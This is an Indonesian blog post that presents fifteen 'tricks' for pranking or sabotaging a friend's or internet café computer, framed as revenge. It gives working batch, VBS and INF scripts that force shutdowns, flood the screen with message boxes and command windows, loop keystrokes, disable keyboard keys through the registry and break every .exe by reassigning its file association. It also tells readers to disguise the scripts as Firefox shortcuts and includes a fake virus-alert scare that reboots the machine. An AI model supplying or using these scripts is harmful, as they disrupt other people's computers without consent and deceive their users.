Posted by : Ary Yulianto Selasa, 15 November 2011

kumpulan Cara Hacker Komputer, berikut ini merupakan cara hack komputer yang super jail. cara ini sangat cocok buat balas dendam dengan teman Anda, dibutuhkan Aplikasi Notepad untuk membuat Jebakan Atau Virus ringan hingga yang sangat mematikan. baiklah saya akan berbagi pengetahuan tentang Cara Hacker Komputer, berikut langkah-langkahnya : 

TRIK 1 - Membuat Forced Shoutdown 
------------------------------------------------- 
@echo off 
msg * I don't like you 
shutdown -c "Error! You are too ******!" -s 
------------------------------------------------- 
simpan kode script yang berwarna Merah di Notepad dengan nama : xhack.BAT type file : All file 
sebarkan File tersebut di Komputer teman Anda, 
maka Komputer korban akan otomatis FORCED SHOUTDOWN 


TRIK 2 - Membuat Tombol Caps Lock menyala terus-menerus 
------------------------------------------------------------------ 
Set wshShell =wscript.CreateObject("WScript.Shell") 
do 
wscript.sleep 100 
wshshell.sendkeys "{CAPSLOCK}" 
loop 
------------------------------------------------------- 
seperti cara yang pertama, hanya berbeda kode script simpan kode yang berwarna biru di Notepad dengan nama : xhack.VBS type File : All File 
sebarkan File berikut di Komputer korban maka, Tombol CAPSLOCK akan menyala terus-menerus 
(bila dimatikan akan menyala lagi) 


TRIK 3 - Membuat Pesan Jail mucul terus 
------------------------------------------------------ 
@ECHO off 
:Begin 
msg * muka kamu sangat jelek 
msg * ngaca dulu gih, 
msg * hayo lo,cpu lu gw acak acak 
msg * udah install ulang aja 
msg * biar masalah nya kelar 
GOTO BEGIN 

------------------------------------------------------ 

simpan kode script yang berwarna hijau dengan nama xhack.BAT type file : All File
Cara ini sangat simple Jail, walaupun di close tab pesan ini masih muncul, kata katanya bisa diubah sesuai selera. 





TRIK 4 - Jail dengan Membuka Tutup CD/DVD room 
------------------------------------------------------ 
Set oWMP = CreateObject("WMPlayer.OCX.7") 
Set colCDROMs = oWMP.cdromCollection 
do 
if colCDROMs.Count >= 1 then 
For i = 0 to colCDROMs.Count - 1 
colCDROMs.Item(i).Eject 
Next 
For i = 0 to colCDROMs.Count - 1 
colCDROMs.Item(i).Eject 
Next 
End If 
wscript.sleep 5000 
loop------------------------------------------------------- 
simpan di Notepad kode berikut dengan nama : xhack.vbs type file : All File 
maka DVD/CD roomnya akan membuka dan menutup otomatis, 


TRIK 5 - Membuat script mucul terus menerus 
------------------------------------------------------- 
Set wshShell = wscript.CreateObject("WScript.Shell") 
do 
wscript.sleep 100 
wshshell.sendkeys "~(enter)" 
loop 
------------------------------------------------------- 
simpan kode berikut di Notepad dengan nama : xhack.vbs type file : All File 
membuat script bermunculan terus menerus 


TRIK 6 - Membuat Tombol Backspace menjadi eror - menekan terus menerus 
-------------------------------------------------------- 
MsgBox "kembali ke menu sebelumnya" 
Set wshShell =wscript.CreateObject("WScript.Shell") 
do 
wscript.sleep 100 
wshshell.sendkeys "{bs}" 
loop 
---------------------------------------------------------- 
simpan kode script berikut di Notepad dengan nama : xhack.vbs type file : All File 
maka Tombol Backspace akan eror dan menekan dengan sendirinya 


TRIK 7 - Cara Membuat Pesan ' Komputer Anda Jelek Banget ' di Notepad/ Wordpad 
----------------------------------------------------------- 
Set wshShell = wscript.CreateObject("WScript.Shell") 
do 
wscript.sleep 100 
wshshell.sendkeys "Komputer Anda Jelek Banget" 
loop 
----------------------------------------------------------- 
ganti kata Komputer Anda Jelek Banget dengan selera Anda, simpan di Notepad dengan nama : xhack.vbs 


TRIK 8 - Cara Membuat Notepad Terbuka Otomatis - terus menerus 
------------------------------------------------------------ 
@ECHO off 
:top 
START %SystemRoot%\system32\notepad.exe 
GOTO top 
------------------------------------------------------------ 
simpan di Notepad dengan nama : xhack.BAT 
maka Notepad akan terbuka terus menerus 



TRIK 9 - Membuat Notepad dengan Pesan Jail 
------------------------------------------------------------- 

WScript.Sleep 1800 
WScript.Sleep 100 
Set WshShell = WScript.CreateObject("WScript.Shell") 
WshShell.Run "notepad" 
WScript.Sleep 10 
WshShell.AppActivate "Notepad" 
WScript.Sleep 50 
WshShell.SendKeys "ka" 
WScript.Sleep 50 
WshShell.SendKeys "mu " 
WScript.Sleep 50 
WshShell.SendKeys "je" 
WScript.Sleep 50 
WshShell.SendKeys "le" 
WScript.Sleep 50 
WshShell.SendKeys "k " 
WScript.Sleep 50 
WshShell.SendKeys " se" 
WScript.Sleep 50 
WshShell.SendKeys "ka" 
WScript.Sleep 50 
WshShell.SendKeys "li" 
WScript.Sleep 50 
WshShell.SendKeys " y" 
WScript.Sleep 50 
WshShell.SendKeys "a" 
WScript.Sleep 50 
WshShell.SendKeys " h" 
WScript.Sleep 50 
WshShell.SendKeys "!" 
WScript.Sleep 50 
WshShell.SendKeys "!! " 
----------------------------------------------------------- 
simpan di Notepad dengan nama : xhack.vbs 
ganti kode yang berwarna merah sesuai dengan selera anda. 


TRIK 10 - Cara Membuat Memilih jawaban seperti Quiz di Notepad 
----------------------------------------------------------- 
@echo off 
title quiz hari ini :) 
:menu 
cls 
echo jika kamu kena virus apa 
yang kamu lakukan 
pause 
echo pilih yang mana: 
echo 1. matiin computer 
echo 2. format aja 
echo 3. bingung ahh 
set input=nothing 
set /p input=Choice: 
if %input%==1 shutdown -s -t 
30 
if %input%==2 del c:xxx 
if %input%==3 @ECHO off 
msg * muka lo rusak 
msg * ngaca dulu gih 
msg * hayo lo,cpu lu gw acak2 
msg * ud install ulang aja 
msg * biar masalah nya kelar 
@ECHO off 
:top 
START %SystemRoot% 
system32notepad.exe 
GOTO top ----------------------------------------------------------- 
simpan kode script berikut di Notepad dengan nama : xhack.BAT 


TRIK 11 - Membuat Komputer Hang dengan Kode script Notepad 
------------------------------------------------------------- 

start 

start 

start 

start 

start 

start 

start 

start 

start 

start 

start 

start 
----------------------------------------------------------- 
simpan di Notepad dengan nama : xhack.BAT 
terus buat shortcut palsu terserah mau shortcut apa, aku saranin shortcutnya browser mozilla terus taro aja di desktop target 
( efeknya akan membuka CDM yang banyak banget sampe layarnya keluar keluar ) 


TRIK 12 - Cara Mematikan Tombol Keyboard 
------------------------------------------------------------- 
1. Salin baris-baris kode (script) berikut , paste pada Notepad dan simpan dengan nama JAIL.INF 

Langsung kita mulai saja : 

[Version] 
Signature=”$Windows NT$” 

[DefaultInstall] 
AddReg =AIUEO 

[AIUEO] 
HKLM,”SYSTEM\CurrentControlSet\Control\Keyboard Layout”,”Scancode Map”,0×1,00,00,00,00,00,00,00,00,06,00,00,00,00,00,1e,00,00,00,12,00,00,00, 
17,00,00,00,18,00,00,00,16,00,00,00,00,00 

————————————— 

2. Untuk menjalankannya, klik kanan nama file JAIL.INF dan pilih menu> Install 

3. Log Off komputernya agar trik ini berfungsi. 

NB : 

Script diatas dimaksudkan untuk mematikan tombol A I U E O pada keyboard. 

Untuk menormalkannya, silahkan salin script berikut : 

————————————— 

[Version] 
Signature=”$Windows NT$” 

[DefaultInstall] 
DelReg =normal 

[normal] 
HKLM,”SYSTEM\CurrentControlSet\Control\Keyboard Layout”,”Scancode Map” 

————————————— 

—> Simpan dengan nama “NORMAL.INF” 
Klik kanan file ini, pilih >Install 
Log Off komputernya. 

sumber artikel hack : kidzoom 


TRIK 13 - Software Buat Jahil - Nakal 
-------------------------------------------------------- 

Software 1 
Kalau yang ini nemu di Kaskus. Tapi dijamin seru banget.. Dan inilah fungsinya : 
-freeze 
-snow 
-earthquake 
-random colours 
-mouse and lines 
-puzzle 
Lihat efeknya dibawah 
Puzzle 
Mouse And Lines 
Masih banyak lagi deh.. Tapi jangan salah cara menghentikannya pun sulit loh.. Buka task manager gag bisa. Klik tombol start gag bisa.. So bagaimana, Cukup Tekan ESC doang kok.. hhee Silahkan dicoba 
Download : klik disini 


Software 2 
Nah kalau yang ini namanya Key joke! Fungsinya bikin lampu disco nih.. Sama seperti script yang saya berikan dulu. Tampilannya seperti yang disamping tuh.. Ini sih masih biasa gag kaya yang diatas tadi.. 
Ow iya tapi sebelumnya jangan kaget ye kalau ada pesan banyak seperti iniKarena ini juga ulahnya ni software. Bisa di close kok.. 
Download : Klik disini 

Software 3 
Wah kali ini parah banget nih. Bisa bikin stress juga. Sampai sekarang saya pun belum tau cara ngatasinnya. Nama softwarenya Stoerung, sepertinya bahasa jerman, pas install pun berbahasa jerman. Software ini meng-invert warna desktop kita berkali-kali secara berkala. Namun efeknya, menurut saya bisa merusak VGA card, dan ini juga bisa bikin komputer lemot.. Ini pun sama dengan software seblumnya. Dy mengeluarkan alert seperti software 2 namun lebih banyak 
Download : klik disini 

Masih ada 46 software lagi yang bisa kalian download untuk ngerjain temen lw.. dan efeknya mantep2 juga loh! Lihat disini 
sumber artikel : kidzoom 


TRIK 14 - Cara Merusak Komputer teman / Warnet 
--------------------------------------------------------------- 
buka cmd(comand prompt), kalo belum tahu nyari dimana , klik start-run-ketik CMD-Lalu ketikan script ini 
ASSOC.exe=.hank 
lalu enter! 
!!!! 
program kayak ms.word/game ngambek jalan ! , n jika sudah puas banget jailnya dan mau ngembaliin-nya , tinggal buka CMD lagi. lalu ketik 
ASSOC.exe=EXEFILE 
--------------------------------------------------------------- 


TRIK 15 - Cara Paling Jahil Jahat 
---------------------------------------------------------------- 

1. BUka program notepad atau biar cepet menu RUN ketik notepad lalu enter 

2. Copy kode ini dan pastekan di notepad kamu 

@echo off 
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX! 
PAUSE 
shutdown -r -t 300 -c ” SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ………..” 

3. Habis itu simpen file notepad ini dengan format *.bat = terserah mau diberi 

nama apa, misal : pacebuk.bat dan SAVE di Dekstop (Recommended) 

4. Sekarang klik kanan desktopmu dan pilih New => Shortcut 

5. Setelah ini akan muncul sebuah tampilan dan klik browse lalu cari lokasi file 

.bat yang kamu simpen tadi, misal tadi kamu save pada dekstop 

6. Klik Next dan Rename dengan Mozilla Firefox (Untuk nama ini terserah kamu 

dan bebas bisa ganti dengan Opera Mini atau Google Chrome, ini hanya 

sebagai tipuan aja) 

7.Bila semua langkah sudah oke, sekarang yang perlu kamu lakuin adalah 

mengubah icon .bat tadi dalam bentuk Mozilla Firefox (karena kita sering pakai 

Mozilla jadi pembahasannya pakai browser ini) .. Terus caranya gimana ? 

Gampang.. tinggal kamu klik kanan file .bat tadi dan pilih change icon 

Gak nemu icon mozilla ? Coba deh low cari di Program Files => Mozilla Firefox 

Nah sekarang virus facebookmu telah jadi dengan sempurna, kalau kamu ingin 

iseng nyoba tinggal di klik aja deh dan lihat perubahan yang akan terjadi .. 

Harusnya pasti sedikit kaget dan coba low bayangin kalau trik ini kamu 

praktekan di kompi temen kamu atau mungkin kompi kampus atau warnet.. 

what will happen ? abis pastinya .. 

Leave a Reply

Subscribe to Posts | Subscribe to Comments

Labels

Followers

FanPage

@ TN. G. Cereme

Loading...
Ardef. Diberdayakan oleh Blogger.

- Copyright © 2013 Ary Yulianto -Metrominimalist- Powered by Blogger - Redesigned by Ary Yulianto -